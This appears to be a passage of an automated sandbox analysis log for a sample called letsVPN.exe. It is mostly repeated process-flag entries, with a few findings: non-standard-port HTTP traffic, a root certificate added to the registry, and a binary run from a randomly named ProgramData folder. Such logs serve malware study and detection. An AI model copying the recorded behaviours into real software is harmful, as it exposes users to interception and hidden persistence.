              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 15628 -> 49725
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180010D70 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0000000180010D70
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\letsvpn-latest.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\letsvpn-latest.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
